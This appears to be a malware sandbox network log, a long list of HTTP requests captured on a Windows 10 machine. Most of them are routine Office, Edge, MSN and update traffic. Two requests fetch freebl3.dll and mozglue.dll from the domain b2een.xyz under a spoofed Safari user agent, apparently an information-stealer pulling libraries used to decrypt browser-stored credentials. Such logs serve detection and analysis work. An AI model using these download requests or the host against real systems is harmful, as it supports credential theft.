Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CLr1vYdRECxUGOz&MD=ON2O2D6F HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4a2a9ed8240d3004231b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.070b7e2c0c11bf3433e5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.80ecb7588d9cda3b33a1.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733135643&P2=404&P3=2&P4=XcmKW8ZHXjEpO7A0uoDPSFZuQnpmTDX7wVhiyEqMmoqf5tEEZTxC%2ffvvmy93ZahKboeCU84CTwXOlZWlgZAI7g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: +R0Ozd05pDBjvbYCcLLL+pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3B41451CF8CD6E141684505EF9E46F8C; _EDGE_S=F=1&SID=0662F9504AB965DD2EE2EC124B70641D; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732530850447&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c9ace0f4103f4a3e9851b1567c7f1f66&activityId=c9ace0f4103f4a3e9851b1567c7f1f66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3B41451CF8CD6E141684505EF9E46F8C; _EDGE_S=F=1&SID=0662F9504AB965DD2EE2EC124B70641D; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1732530850447&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B41451CF8CD6E141684505EF9E46F8C&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732530850447&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c9ace0f4103f4a3e9851b1567c7f1f66&activityId=c9ace0f4103f4a3e9851b1567c7f1f66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEDBCD4E4EB849C3A0914972165CB7CB&RedC=c.msn.com&MXFR=3B41451CF8CD6E141684505EF9E46F8C HTTP/1.1Host: c.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-MS-GEC: DC66C5D1567EFEAFA8FB7BEADF0606CF03FEAF4655AB4B38BA7C1E64CD7C27E6Sec-MS-GEC-Version: 1-117.0.2045.47Referer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msDBP.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1732530850447&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B41451CF8CD6E141684505EF9E46F8C&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1514711e372199985a71a6e1732530851; XID=1514711e372199985a71a6e1732530851
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
